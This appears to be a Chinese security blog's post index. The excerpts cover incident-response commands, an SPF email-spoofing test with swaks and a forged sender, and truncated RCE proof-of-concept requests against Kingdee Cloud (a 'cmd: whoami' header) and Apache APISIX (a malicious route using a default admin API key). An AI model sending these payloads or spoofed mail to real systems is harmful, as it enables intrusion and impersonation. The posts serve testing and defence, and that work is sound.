阶段性回顾
前言公司的知识分享会轮到我了,怎么做ppt还没想清楚,先把要说的先写好吧() 应急响应僵尸木马远控事件唉去应急过的企业都是中小企业,不说安全设备了,有的连像样的交换机都没有,只有一个路由器,面板都不知道怎么进能拿到的信息就是通报上给的ip,然后对着ip查的一些威胁情报那么首先,依照惯例,先查外连 1netstat -ano | findstr ip 红框那一列就是pid 有东西的话定位到,然后在交换机或者路由器上设置阻断规则,把恶意ip全阻断了根据pid定位进程名 1tasklist /FI "PID eq 4992" 找到进程名然后就是找他的位置了 任务管理器查找进程可以直接打开任务管理器找,在详细信息那里,找到后右键找路径 命令行查找进程cmd1dir C:\a.exe /s /b 这个是当时有次渗透,找不到传的马子放哪了,然后用的命令,后来想到这个适用于前面没查出外连,但是威胁情报上面显示恶意样本数很少的情况,直接用这个命令查就行 powershell1Get-Process steam | Select-Object...
SPF 邮件伪造漏洞
搓了个工具工具地址,写了个tags: - 瞎琢磨 categories: 自研 date: 2025-11-11 --- # [工具地址](https://github.com/la 说明 干中学以前没接触过的漏洞,干中学了,以后搞测试,多个测试方向 复现直接用邮件协议测试的工具swaks就行 1swaks --body "wow" --header "Subject:test" -t "xxx@163.com" -f "test@nbjingyun.com" 测试不用163邮箱的话,一般发不过去然后邮箱收到邮件
金蝶云星空反序列化rce至反弹shell(不能一把梭版)
poc一把梭rce口子不用特意找,正常抓金蝶云的都有然后就是直接一把梭 1234567POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.AppDesigner.AppDesignerService.RecordCurDevCodeInfo.common.kdsvc HTTP/1.1Host: cmd: whoamiContent-Type: application/jsonContent-Length:...
有惊无险的应急排查
...
存储桶的一些测试思路
...
艰难的应急,但定位到了主机,找到了木马
事件背景最近在网信办驻场,大多数时候蛮闲的,基本就是搞文档,然后企业要复测,天天被骚扰麻了,就写exp给他们让他们自测,但是有安全事件就要出去应急。这不就接到一个通报,说是木马远控事件看通报文件,时间跨度是2025-09-15 12:45:12-2025-09-15...
![[纯记录用]apache apisix默认密钥致rce漏洞](/img/c1/4.webp)
[纯记录用]apache apisix默认密钥致rce漏洞
poc`x写入恶意路由 1234567891011121314151617181920POST /apisix/admin/routes HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-API-KEY: edd1c9f034335f136f87ad84b625c8f1{ ...
![[纯记录用]ldap未授权访问漏洞](/img/cover/3.webp)
[纯记录用]ldap未授权访问漏洞
纯记录用用到ldap browser,连一下就行
[纯记录用]CORS跨域访问复测,与未授权的对比
说实话,懵了其实我真挺懵的,一开始是企业来扯皮嘛,我想着这种洞,能有啥难测的,然后测得时候,咋感觉,这是个未授权访问啊,越来越懵逼了 未授权访问与CORS访问的区别 特征 CORS配置漏洞 未授权访问 (Unauthorized Access) 漏洞性质 配置错误:服务器响应头策略不当,浏览器放松限制 权限控制缺失:服务端未对请求进行身份认证或鉴权 关键表现 服务器响应头反射了请求的Origin或使用通配符*,且允许凭据 不携带任何认证信息(如Cookie、Token)也能访问敏感数据 利用条件 需要用户浏览器环境,依赖浏览器遵守CORS规则 无需浏览器环境,直接访问接口即可 攻击目标 窃取信息:利用用户身份读取敏感数据 直接获取数据或执行未授权操作 防御重点 严格校验Origin头、避免凭据与通配符共用 加强接口的身份认证和权限校验 回到这个洞说实话,我觉得他两者都是啊,包未授权的,也包跨域的
![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)